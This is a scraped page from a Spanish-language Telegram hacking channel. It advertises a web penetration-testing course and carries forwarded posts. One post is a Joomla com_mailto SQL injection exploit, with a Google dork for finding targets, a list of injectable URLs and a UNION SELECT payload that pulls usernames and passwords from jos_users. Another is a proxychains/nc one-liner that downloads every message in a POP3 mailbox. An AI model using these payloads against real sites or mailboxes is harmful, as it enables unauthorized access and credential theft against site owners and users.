tpx Security ⠠⠵
2.41K subscribers
2.32K photos
103 videos
24 files
3.97K links
Hacking, ciberseguridad e Inteligencia.
Download Telegram
Real
📢 Entrenamiento Web Penetration Tester en Linea !!
📅 03 días [ 06,07,08 de Febrero 2019, 3 horas por día !]

‼️El curso tiene como propósito entrenar a recursos humanos en la evaluación de los controles de seguridad implementados por los equipos de desarrollo, a fin de poder detectar vulnerabilidades que pongan en riesgo la información relacionada a dichas aplicaciones.

Durante el curso, el alumno, será capaz de identificar las tecnologías utilizadas por la aplicación, la lógica de negocio implementada, ejecutar un análisis a conciencia sobre la estructura de la aplicación web y probar los dominios de seguridad en la aplicación.

Dirigido a: Dev, Entusiastas de la seguridad y hacking, Ingenieros en sistemas, área de seguridad de la información, Especialistas TI, Ingenieros de seguridad en centro de datos, desarrolladores Web y empresas que desean actualizar sus conocimientos.

No te quedes fuera, cupo limitado !!

https://tpx.mx/cursos/web-penetration-tester/en-linea
Feliz año 2019 !! Este año tendremos cursos online !! más conferencias y más CTF !! y más retos #happyHacking
Forwarded from 「Drok3r」
Joomla Mailto Components 1.2.2.2 SQL Injection
# Author [ Discovered By ] :
KingSkrupellos
# Google Dorks :
inurl:''/index.php?option=com_mailto''
# PacketStormSecurity :
packetstormsecurity.com/files/authors/13968

SQL Injection Exploit

/index.php?option=com_mailto&tmpl=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&type=raw&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=mailto&article=[SQL Injection]&Itemid=1

/index.php?option=com_mailto&tmpl=mailto&article=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=gantry&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=skyextend-fjt&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=kallyas&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=ca_cloudbase2_j25&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=jf_texturia&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=jsn_boot_pro&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=jm-business-marketing&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=findario1.7&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=beez_20&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=allrounder-j1.6&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=siteground-j16-41&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=nagariknews&link=[SQL Injection]

/index.php?option=com_mailto&tmpl=component&template=sarmuni&link=[SQL Injection]

Example SQL Injection Exploit Payload
+and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--
+and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--&Itemid=1


Example SQL Database Error
Strict Standards: Non-static method JLoader::import() should not be called statically in /home/hellfire/public_html/libraries/joomla/import.php on line 29

Strict Standards: Only variables should be assigned by reference in /web/htdocs/www.xxx.it/home/templates/it_thelodge3/component.php on line 12

Strict Standards: Accessing static property JCache::$_handler as non static in /web/htdocs/www.xxx.it/home/old_site_2015/libraries/joomla/cache/cache.php on line 420
Forwarded from ..
One liner para jalar todos los emails de un buzón..
echo "USER auser@mail.server\nPASS password2018\n$(for n in {1..344}; do echo RETR $n; done)" | proxychains nc -vv mail.server.addr 110 | tee -a auser-email.txt